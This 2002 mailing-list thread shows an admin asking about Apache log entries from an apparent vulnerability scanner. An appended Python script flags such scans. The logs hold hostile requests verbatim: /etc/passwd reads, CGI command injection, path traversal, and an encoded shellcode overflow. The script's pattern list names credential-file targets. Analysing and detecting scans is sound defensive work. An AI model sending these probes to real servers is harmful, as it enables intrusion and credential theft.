Hi,

read this: http://lists.suse.com/archive/suse-security/2001-Nov/0314.html

Regards
Ruediger

Charles Funderburk wrote:
Hello all,
I am new to the list and have gained a ton from reading all the comments and suggestions. I thought someone might be able to help me out and give me their two cents on something I noticed in my Apache access logs. Looks like a buffer overflow intended for an NT machine.
10.70.24.222 - - [10/Jul/2002:01:05:44 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /IAmAScaryCyberCop.SNI" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/openfile.cfm HTTP/1.0" 404 302
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%03%CA%FF%D1c:\command.com_ /c_copy_\WebSite\readme.1st_\WebSite\htdocs\cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/displayopenedfile.cfm HTTP/1.0" 404 311
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/exprcalc.cfm HTTP/1.0" 404 302
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET //etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/info2www?(../../../../../../../../sbin/ping-c%d%s|)" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/pfdispaly?../../../../../etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "get /" 501 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/MachineInfo" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /IAmAScaryCyberCop.SNI" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=NA I+Test&dbq=..%2fwwwroot%2fNAI-18719.htm&newdb=CREATE_DB&attr= HTTP/1.0" 404 299
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /ASPSamp/ HTTP/1.0" 404 283
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/Count.cgi?dd=aa HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /mylog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET / HTTP/1.0" 200 1350
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /mlog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /php/mylog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "POST /cgi-win/uploader.exe/cgi-win/ HTTP/1.0" 404 304
I haven't seen any of the code for the latest apache chunk exploit. Anyone have any ideas or suggestions?
Thanks!
-Charles
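An added example, not from either message: a small Python script that parses Apache access-log lines like the ones Charles posted and flags the scanner behaviour they show, namely one client producing a burst of 404s and requests carrying well-known probe strings. The sample lines are constructed from a subset of the post's entries plus one benign client, and the 60-second window and 404-count thresholds are assumed values, not anything the thread states.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache common log format; the request may lack an "HTTP/x.y" suffix, as in the post.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)')
# Request substrings typical of scanner probes; all of them appear in the post.
PROBE_PATTERNS = ("/etc/passwd", "..\\..", "../", "win-c-sample.exe",
                  ".SNI", "newdsn.exe", "cfdocs/expeval", "win.ini")
# Constructed sample: a subset of the post's lines plus one benign client (192.0.2.10).
SAMPLE_LOG = """\
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /IAmAScaryCyberCop.SNI" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET //etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /carbo.dll?icatcommand=..\\..\\winnt\\win.ini&catalogname=catalog" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/pfdispaly?../../../../../etc/passwd" 404 -
192.0.2.10 - - [10/Jul/2002:01:07:00 -0500] "GET /index.html HTTP/1.0" 200 1350
"""

def parse_line(line):
    """Return {ip, ts, req, status} for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"), "req": m.group("req"),
            "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
            "status": int(m.group("status"))}

def is_probe(req):
    return any(p in req for p in PROBE_PATTERNS)

def find_scanners(lines, window_s=60, min_404=5):
    """Flag IPs with >= min_404 404s in any window_s seconds, or any probe request."""
    by_ip = defaultdict(list)
    for entry in filter(None, map(parse_line, lines)):
        by_ip[entry["ip"]].append(entry)
    report = {}
    for ip, entries in by_ip.items():
        entries.sort(key=lambda e: e["ts"])
        probes = [e["req"] for e in entries if is_probe(e["req"])]
        ts_404 = [e["ts"] for e in entries if e["status"] == 404]
        best = j = 0
        for i, t in enumerate(ts_404):  # sliding window over 404 timestamps
            while (t - ts_404[j]).total_seconds() > window_s:
                j += 1
            best = max(best, i - j + 1)
        if best >= min_404 or probes:
            report[ip] = {"max_404_in_window": best, "probe_requests": probes}
    return report
```

Run it over a real access_log with `find_scanners(open("access_log").readlines())`; the probe list is deliberately short and should be extended with whatever your own scanner noise looks like.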